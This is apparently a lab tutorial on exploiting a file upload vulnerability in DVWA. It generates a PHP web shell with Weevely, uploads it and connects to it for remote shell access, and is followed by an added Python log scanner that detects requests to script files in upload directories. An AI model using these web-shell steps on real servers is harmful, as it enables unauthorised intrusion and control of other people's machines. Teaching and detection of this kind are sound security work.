![](https://static.wixstatic.com/media/642e54_17e1818b7a29488a94fce8a039093914~mv2.png/v1/fill/w_790,h_355,al_c,q_85,enc_auto/642e54_17e1818b7a29488a94fce8a039093914~mv2.png)
How To Exploit File Upload Vulnerabilities Using Weevely
Steps
1: Generate backdoor
2: Upload File
3: Gain Access
Let's talk about file upload vulnerabilities. These are the simplest type of vulnerability because they allow us to upload any file, so if the target runs PHP, it will let us upload a PHP file or even a PHP shell to gain full control of the target computer.
To start, we are going to use a tool called Weevely. Weevely is a very simple and straightforward tool that generates a PHP web shell that acts like a telnet connection.
$ weevely -h
usage: weevely [-h] {terminal,session,generate} ...

positional arguments:
  {terminal,session,generate}
    terminal    Run terminal or command on the target
    session     Recover an existing session
    generate    Generate new agent

options:
  -h, --help    show this help message and exit
Command
$ weevely generate <password> <name>
![](https://static.wixstatic.com/media/642e54_f01f6eedb06a406c91448a08848fa17e~mv2.jpg/v1/fill/w_651,h_76,al_c,q_80,enc_auto/642e54_f01f6eedb06a406c91448a08848fa17e~mv2.jpg)
Once the generated file has been uploaded, we will want to navigate to the file path of the upload. For example, in our case it would be "http://10.0.2.5/dvwa/hackable/uploads/shell.php".
![](https://static.wixstatic.com/media/642e54_6dc16dfb389841629cdfd0a7f34d3bd7~mv2.png/v1/fill/w_980,h_653,al_c,q_90,usm_0.66_1.00_0.01,enc_auto/642e54_6dc16dfb389841629cdfd0a7f34d3bd7~mv2.png)
Perfect! Our file has successfully been uploaded. Our next step is to make a connection with our file. To do this, we can use weevely followed by the URL and the password we entered earlier.
$ weevely http://10.0.2.5/dvwa/hackable/uploads/shell.php 54321
Now that this is done, we have successfully gained access to the machine via the PHP shell we generated using Weevely.
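On the defending side, the requests made above are visible in the web server's access log, because a script-typed file is being requested from inside an upload directory. The following is an added example, not part of the original post or of Weevely: it assumes Combined Log Format, an assumed list of PHP-handled extensions, and constructed sample log lines; only the upload path comes from the URL shown above.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumption: extensions this server may pass to the PHP interpreter.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
# Upload directory taken from the URL shown in the article.
UPLOAD_DIRS = ("/dvwa/hackable/uploads/",)
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def script_segment(rel_path):
    """Return the first path segment carrying a script extension, else None."""
    for seg in rel_path.split("/"):
        # Test every extension so "x.PHP", "x.php." and "x.php.jpg" are caught.
        exts = seg.lower().rstrip(". ").split(".")[1:]
        if any(ext in SCRIPT_EXTS for ext in exts):
            return seg
    return None

def find_upload_script_hits(lines):
    """Flag requests that address a script-typed file inside an upload dir."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, status = m.groups()
        # Drop the query string and decode percent-escapes before matching.
        path = unquote(urlsplit(target).path)
        for d in UPLOAD_DIRS:
            if path.lower().startswith(d):
                seg = script_segment(path[len(d):])
                if seg:
                    hits.append({"ip": ip, "time": ts, "method": method,
                                 "file": seg, "status": int(status)})
                break
    return hits

# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '10.0.2.15 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.2.15 - - [01/Jan/2024:10:00:05 +0000] "GET /dvwa/hackable/uploads/shell.php HTTP/1.1" 200 0',
    '10.0.2.15 - - [01/Jan/2024:10:00:09 +0000] "POST /dvwa/hackable/uploads/shell%2Ephp HTTP/1.1" 200 312',
    '10.0.2.20 - - [01/Jan/2024:10:02:00 +0000] "GET /dvwa/hackable/uploads/cat.png HTTP/1.1" 200 667',
    '10.0.2.20 - - [01/Jan/2024:10:03:00 +0000] "GET /dvwa/hackable/uploads/Photo.PHP.jpg?v=1 HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in find_upload_script_hits(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 means the server answered a request for a script inside the upload directory, which points to the underlying fix: the upload handler should reject script extensions and the upload directory should not be configured to execute PHP.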